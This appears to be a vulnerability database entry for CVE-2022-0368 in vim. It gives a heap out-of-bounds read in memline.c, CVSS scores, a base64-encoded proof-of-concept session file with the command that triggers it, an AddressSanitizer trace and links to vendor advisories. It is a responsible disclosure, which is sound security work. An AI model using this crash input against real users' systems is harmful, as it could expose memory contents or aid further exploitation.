Lucene search
OctaviogallandBCA9CE1F-400A-4BF9-9207-3F3187CB3FA9HistoryJan 24, 2022 - 2:53 p.m.
in vim/vim
2022-01-2414:53:26
octaviogalland
www.huntr.dev
9
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
48.7%
Description
A heap-based OOB read of size 4 occurs when a user tries to open a vim session file specified below. This happens regardless of any command line options that could be specified to restrict vim, such -Z and -m. This bug has been found on default vim build (lastest commit hash 8e4af851fd3eff4b22fca962e5be783742e8f1bb) on Ubuntu 20.04 for x86_64/amd64.
Proof of Concept
Here is the smallest poc we were able to produce (it is base64 encoded since it contains some unprintable characters, it’s also fairly large, but we haven’t been able to minimize it further):
$ echo -ne "ZGVGEDAw7sow////f5kwMDAwMDAwMDAwMDAwMDAKICBkZWYwMDAwMDAwMDAwMDAwMDAwMDAwMDDe
AAojf+QwMDAwMDAwlo0wMDAwMDAwMDAwMApbCiBzaWwhbm9ybTBlZW5kcyBzaWwhbm9ybTBSHirt
kTB7DS8vA1ZubyAgbm9yCjB1CnN1ISowMDAwMDAwCnNpbCFub3JthyogKiBub3Iwbm+Nks+KZHN1
ISosKgtub35tMHUJc2n/AApzaQAKICBkZWYgU2Vjb25kRnVuY3RpwTAwMDAwMDAwMDAwMDCsMDAw
KDAJMDAwMDAwMDAwMDAwMDAwMDAwMDAwCm4=" | base64 -d > poc
$ vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ':qa!'
=================================================================
==52803==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000085b1 at pc 0x7f76508e5f40 bp 0x7ffe59bfb120 sp 0x7ffe59bfa8c8
READ of size 4 at 0x6020000085b1 thread T0
#0 0x7f76508e5f3f in __interceptor_memmove (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f)
#1 0x55b8deba6cce in ml_flush_line /home/faraday/vim/src/memline.c:4028
#2 0x55b8deba0811 in ml_append_flush /home/faraday/vim/src/memline.c:3313
#3 0x55b8deba0a6c in ml_append_flags /home/faraday/vim/src/memline.c:3358
#4 0x55b8deba0956 in ml_append /home/faraday/vim/src/memline.c:3345
#5 0x55b8de739794 in open_line /home/faraday/vim/src/change.c:2139
#6 0x55b8dec75acf in n_opencmd /home/faraday/vim/src/normal.c:6528
#7 0x55b8dec8320e in nv_open /home/faraday/vim/src/normal.c:7664
#8 0x55b8dec3ab1f in normal_cmd /home/faraday/vim/src/normal.c:1120
#9 0x55b8de9972ac in exec_normal /home/faraday/vim/src/ex_docmd.c:8629
#10 0x55b8de99706b in exec_normal_cmd /home/faraday/vim/src/ex_docmd.c:8592
#11 0x55b8de996589 in ex_normal /home/faraday/vim/src/ex_docmd.c:8510
#12 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#13 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#14 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#15 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#16 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#17 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#18 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#19 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#20 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#21 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#22 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#23 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#24 0x55b8de6c0cbd in _start (/home/faraday/vim/src/vim+0x125ccbd)
0x6020000085b1 is located 0 bytes to the right of 1-byte region [0x6020000085b0,0x6020000085b1)
allocated by thread T0 here:
#0 0x7f7650952bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8)
#1 0x55b8de6c117e in lalloc /home/faraday/vim/src/alloc.c:248
#2 0x55b8de6c0f29 in alloc /home/faraday/vim/src/alloc.c:151
#3 0x55b8de6c13c2 in vim_memsave /home/faraday/vim/src/alloc.c:601
#4 0x55b8deba0ce3 in ml_replace_len /home/faraday/vim/src/memline.c:3435
#5 0x55b8df128fec in u_undoredo /home/faraday/vim/src/undo.c:2811
#6 0x55b8df1262cb in undo_time /home/faraday/vim/src/undo.c:2563
#7 0x55b8de991611 in ex_undo /home/faraday/vim/src/ex_docmd.c:7979
#8 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#9 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#10 0x55b8deec9c2f in do_source /home/faraday/vim/src/scriptfile.c:1512
#11 0x55b8deec6c0c in cmd_source /home/faraday/vim/src/scriptfile.c:1098
#12 0x55b8deec6dc9 in ex_source /home/faraday/vim/src/scriptfile.c:1124
#13 0x55b8de958aa4 in do_one_cmd /home/faraday/vim/src/ex_docmd.c:2567
#14 0x55b8de94c42d in do_cmdline /home/faraday/vim/src/ex_docmd.c:993
#15 0x55b8de949fa7 in do_cmdline_cmd /home/faraday/vim/src/ex_docmd.c:587
#16 0x55b8df446dc9 in exe_commands /home/faraday/vim/src/main.c:3091
#17 0x55b8df4388bf in vim_main2 /home/faraday/vim/src/main.c:774
#18 0x55b8df437da5 in main /home/faraday/vim/src/main.c:426
#19 0x7f764ee940b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0xa0f3f) in __interceptor_memmove
Shadow bytes around the buggy address:
0x0c047fff9060: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9070: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9080: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9090: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff90a0: fa fa fd fa fa fa fd fa fa fa 03 fa fa fa 00 05
=>0x0c047fff90b0: fa fa fd fa fa fa[01]fa fa fa 01 fa fa fa fd fd
0x0c047fff90c0: fa fa 00 01 fa fa fd fa fa fa fd fd fa fa 01 fa
0x0c047fff90d0: fa fa 00 03 fa fa 01 fa fa fa fd fa fa fa fd fa
0x0c047fff90e0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa 00 01
0x0c047fff90f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9100: fa fa 02 fa fa fa 00 01 fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==52803==ABORTING
Impact
This vulnerability is capable disclosing data and might lead to bypass protection mechanisms facilitating successful exploitation of other memory corruption vulnerabilities that may lead to code execution.
Acknowledgements
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.
Related
cve
cve
CVE-2022-0368
2022-01-26 18:15:00
veracode
veracode
Out Of Bounds (OOB) Read
2022-02-14 00:29:36
cbl_mariner
cbl_mariner
CVE-2022-0368 affecting package vim 8.2.4081-1
2022-04-09 06:51:50
CVE-2022-0368 affecting package vim 8.2.4151-1
2022-02-25 01:45:45
debiancve
debiancve
CVE-2022-0368
2022-01-26 18:15:00
ubuntucve
ubuntucve
CVE-2022-0368
2022-01-26 00:00:00
alpinelinux
alpinelinux
CVE-2022-0368
2022-01-26 18:15:00
redhatcve
redhatcve
CVE-2022-0368
2022-01-31 04:27:06
prion
prion
Design/Logic Flaw
2022-01-26 18:15:00
osv
osv
CVE-2022-0368
2022-01-26 18:15:00
vim vulnerabilities
2022-06-02 12:21:05
vim vulnerabilities
2023-04-19 08:57:30
cloudlinux
cloudlinux
Fix of CVE: CVE-2022-0351, CVE-2022-0368, CVE-2022-0359, CVE-2022-0361
2022-02-14 16:21:58
photon
photon
Important Photon OS Security Update - PHSA-2022-0448
2022-03-03 00:00:00
Important Photon OS Security Update - PHSA-2022-0367
2022-03-07 00:00:00
Important Photon OS Security Update - PHSA-2022-0161
2022-03-13 00:00:00
nessus
nessus
EulerOS 2.0 SP8 : vim (EulerOS-SA-2022-1953)
2022-06-22 00:00:00
Ubuntu 16.04 ESM : Vim vulnerabilities (USN-5458-1)
2022-06-02 00:00:00
EulerOS 2.0 SP10 : vim (EulerOS-SA-2022-1655)
2022-05-06 00:00:00
ubuntu
ubuntu
Vim vulnerabilities
2022-06-02 00:00:00
Vim vulnerabilities
2023-04-19 00:00:00
debian
debian
[SECURITY] [DLA 2947-1] vim security update
2022-03-11 22:50:56
[SECURITY] [DLA 3182-1] vim security update
2022-11-08 14:54:53
cloudfoundry
cloudfoundry
USN-6026-1: Vim vulnerabilities | Cloud Foundry
2023-04-24 00:00:00
apple
apple
About the security content of macOS Monterey 12.6
2022-09-12 00:00:00
About the security content of macOS Ventura 13
2022-10-24 00:00:00
gentoo
gentoo
Vim, gVim: Multiple Vulnerabilities
2022-08-21 00:00:00
avleonov
avleonov
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
48.7%
Related for BCA9CE1F-400A-4BF9-9207-3F3187CB3FA9